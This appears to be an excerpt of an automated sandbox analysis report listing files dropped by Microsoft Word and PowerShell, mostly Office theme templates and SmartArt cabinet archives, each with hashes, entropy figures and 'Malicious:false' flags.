                                                                                                                                                SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                                                                                SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1649585
                                                                                                                                                Entropy (8bit):7.875240099125746
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                                                MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                                                SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                                                SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                                                SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):284
                                                                                                                                                Entropy (8bit):3.5552837910707304
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                                                                                MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                                                                                SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                                                                                SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                                                                                SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):976001
                                                                                                                                                Entropy (8bit):7.791956689344336
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                                                MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                                                SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                                                SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                                                SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.5270134268591966
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                                                                                MD5:327DA4A5C757C0F1449976BE82653129
                                                                                                                                                SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                                                                                SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                                                                                SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1750795
                                                                                                                                                Entropy (8bit):7.892395931401988
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                                                                                MD5:529795E0B55926752462CBF32C14E738
                                                                                                                                                SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                                                                                SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                                                                                SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):3.528155916440219
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                                                                                                                MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                                                                                                                SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                                                                                                                SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                                                                                                                SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1091485
                                                                                                                                                Entropy (8bit):7.906659368807194
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):3.5301133500353727
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                                                                                MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                                                                                SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                                                                                SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                                                                                SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                                                                                Malicious:false
Preview:[File] OriginalName: Gallery.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1204049
                                                                                                                                                Entropy (8bit):7.92476783994848
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                                                MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                                                SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                                                SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                                                SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276
                                                                                                                                                Entropy (8bit):3.5364757859412563
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                                                                                MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                                                                                SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                                                                                SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                                                                                SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                                                                                Malicious:false
Preview:[File] OriginalName: Savon.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2218943
                                                                                                                                                Entropy (8bit):7.942378408801199
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                                                                                                                MD5:EE33FDA08FBF10EF6450B875717F8887
                                                                                                                                                SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                                                                                                                SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                                                                                                                SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.544065206514744
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                                                                                MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                                                                                SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                                                                                SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                                                                                SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                                                                                Malicious:false
Preview:[File] OriginalName: Damask.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2357051
                                                                                                                                                Entropy (8bit):7.929430745829162
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                                                                                                                MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                                                                                                                SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                                                                                                                SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                                                                                                                SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276
                                                                                                                                                Entropy (8bit):3.516423078177173
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                                                                                                                MD5:5402138088A9CF0993C08A0CA81287B8
                                                                                                                                                SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                                                                                                                SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                                                                                                                SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                                                                                                                Malicious:false
Preview:[File] OriginalName: Slate.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2924237
                                                                                                                                                Entropy (8bit):7.970803022812704
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286
                                                                                                                                                Entropy (8bit):3.5434534344080606
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                                                                                MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                                                                                SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                                                                                SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                                                                                SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                                                                                Malicious:false
Preview:[File] OriginalName: Main_Event.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3078052
                                                                                                                                                Entropy (8bit):7.954129852655753
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):274
                                                                                                                                                Entropy (8bit):3.5303110391598502
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                                                                                MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                                                                                SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                                                                                SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                                                                                SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: Mesh.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):3611324
                                                                                                                                                Entropy (8bit):7.965784120725206
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                                                                                                                MD5:FB88BFB743EEA98506536FC44B053BD0
                                                                                                                                                SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                                                                                                                SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                                                                                                                SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):288
                                                                                                                                                Entropy (8bit):3.5359188337181853
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                                                                                                                MD5:0FEA64606C519B78B7A52639FEA11492
                                                                                                                                                SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                                                                                                                SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                                                                                                                SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: Vapor_Trail.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):274
                                                                                                                                                Entropy (8bit):3.4699940532942914
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                                                                                                                MD5:55BA5B2974A072B131249FD9FD42EB91
                                                                                                                                                SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                                                                                                                SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                                                                                                                SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File] OriginalName: Insight design set.dotx Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {WD Document Parts}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3465076
                                                                                                                                                Entropy (8bit):7.898517227646252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22149
                                                                                                                                                Entropy (8bit):7.659898883631361
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                                                                                MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                                                                                SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                                                                                SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                                                                                SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):19893
                                                                                                                                                Entropy (8bit):7.592090622603185
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                                                                                MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                                                                                SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                                                                                SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                                                                                SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21357
                                                                                                                                                Entropy (8bit):7.641082043198371
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                                                                                                                MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                                                                                                                SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
